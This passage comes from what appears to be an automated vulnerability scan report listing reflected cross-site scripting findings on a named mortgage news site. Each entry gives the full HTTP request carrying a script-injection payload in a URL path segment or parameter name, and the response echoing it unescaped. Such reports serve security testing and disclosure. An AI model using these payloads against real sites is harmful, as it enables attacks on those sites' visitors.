Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41334>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74370


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
te" type="application/rss+xml" title=" Late O.C. mortgage payments drop - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/?30dce\"><script>alert(1)</script>046932d1455=1feed/" />
...[SNIP]...

1.361. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18630"><script>alert(1)</script>df0e4fbd4ac was submitted in the REST URL parameter 5. This input was echoed as 18630\"><script>alert(1)</script>df0e4fbd4ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/4134018630"><script>alert(1)</script>df0e4fbd4ac/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
rnate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/4134018630\"><script>alert(1)</script>df0e4fbd4ac/feed/" />
...[SNIP]...

1.362. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cd4"><script>alert(1)</script>0a7d55204ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 87cd4\"><script>alert(1)</script>0a7d55204ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/?87cd4"><script>alert(1)</script>0a7d55204ed=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41340>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80681


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
e=" CA. foreclosure starts fall, but more auctions set - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/?87cd4\"><script>alert(1)</script>0a7d55204ed=1feed/" />
...[SNIP]...

1.363. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa0d"><script>alert(1)</script>b758a53c615 was submitted in the REST URL parameter 5. This input was echoed as 1aa0d\"><script>alert(1)</script>b758a53c615 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/413841aa0d"><script>alert(1)</script>b758a53c615/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
ternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/413841aa0d\"><script>alert(1)</script>b758a53c615/feed/" />
...[SNIP]...

1.364. http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e8b"><script>alert(1)</script>6320bb6e639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 27e8b\"><script>alert(1)</script>6320bb6e639 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/?27e8b"><script>alert(1)</script>6320bb6e639=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41384>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89941


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
port home in &#8216;squatting&#8217; case set for auction - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/newport-home-in-squatters-case-set-for-auction/41384/?27e8b\"><script>alert(1)</script>6320bb6e639=1feed/" />
...[SNIP]...

1.365. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5115"><script>alert(1)</script>56f1b51a9ac was submitted in the REST URL parameter 5. This input was echoed as a5115\"><script>alert(1)</script>56f1b51a9ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318a5115"><script>alert(1)</script>56f1b51a9ac/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318a5115\"><script>alert(1)</script>56f1b51a9ac/feed/" />
...[SNIP]...

1.366. http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf971"><script>alert(1)</script>7480d29f651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf971\"><script>alert(1)</script>7480d29f651 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/?bf971"><script>alert(1)</script>7480d29f651=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41318>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81637


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
217;t hold your breath for a refund - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/15/poor-lender-service-dont-hold-your-breath-for-a-refund/41318/?bf971\"><script>alert(1)</script>7480d29f651=1feed/" />
...[SNIP]...

1.367. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/25/foreclosures-down-31-in-state/41514/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e83f7"><script>alert(1)</script>7acb025cf16 was submitted in the REST URL parameter 5. This input was echoed as e83f7\"><script>alert(1)</script>7acb025cf16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/25/foreclosures-down-31-in-state/41514e83f7"><script>alert(1)</script>7acb025cf16/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514e83f7\"><script>alert(1)</script>7acb025cf16/feed/" />
...[SNIP]...

1.368. http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/25/foreclosures-down-31-in-state/41514/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39195"><script>alert(1)</script>7289003fdd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 39195\"><script>alert(1)</script>7289003fdd6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/25/foreclosures-down-31-in-state/41514/?39195"><script>alert(1)</script>7289003fdd6=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41514>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78706


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
ernate" type="application/rss+xml" title=" Foreclosures down 31% in state - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/25/foreclosures-down-31-in-state/41514/?39195\"><script>alert(1)</script>7289003fdd6=1feed/" />
...[SNIP]...

1.369. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/26/7900-o-c-homes-seized-in-2010/41532/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70fcf"><script>alert(1)</script>62ea07ed0d1 was submitted in the REST URL parameter 5. This input was echoed as 70fcf\"><script>alert(1)</script>62ea07ed0d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/26/7900-o-c-homes-seized-in-2010/4153270fcf"><script>alert(1)</script>62ea07ed0d1/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:54 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/4153270fcf\"><script>alert(1)</script>62ea07ed0d1/feed/" />
...[SNIP]...

1.370. http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/26/7900-o-c-homes-seized-in-2010/41532/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f46"><script>alert(1)</script>4549895a33a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a7f46\"><script>alert(1)</script>4549895a33a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/26/7900-o-c-homes-seized-in-2010/41532/?a7f46"><script>alert(1)</script>4549895a33a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41532>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 115806


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
rnate" type="application/rss+xml" title=" 7,900 O.C. homes seized in 2010 - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/26/7900-o-c-homes-seized-in-2010/41532/?a7f46\"><script>alert(1)</script>4549895a33a=1feed/" />
...[SNIP]...

1.371. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4962"><script>alert(1)</script>87890681c86 was submitted in the REST URL parameter 5. This input was echoed as e4962\"><script>alert(1)</script>87890681c86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590e4962"><script>alert(1)</script>87890681c86/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590e4962\"><script>alert(1)</script>87890681c86/feed/" />
...[SNIP]...

1.372. http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36eb"><script>alert(1)</script>60713eca42a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a36eb\"><script>alert(1)</script>60713eca42a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/?a36eb"><script>alert(1)</script>60713eca42a=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41590>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83515


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
rss+xml" title=" $3.5 million Irvine foreclosure hits market - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/3-5-million-irvine-foreclosure-hits-market/41590/?a36eb\"><script>alert(1)</script>60713eca42a=1feed/" />
...[SNIP]...

1.373. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/couple-might-be-better-off-with-short-sale/41502/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5367a"><script>alert(1)</script>8c4f91db03b was submitted in the REST URL parameter 5. This input was echoed as 5367a\"><script>alert(1)</script>8c4f91db03b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/29/couple-might-be-better-off-with-short-sale/415025367a"><script>alert(1)</script>8c4f91db03b/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
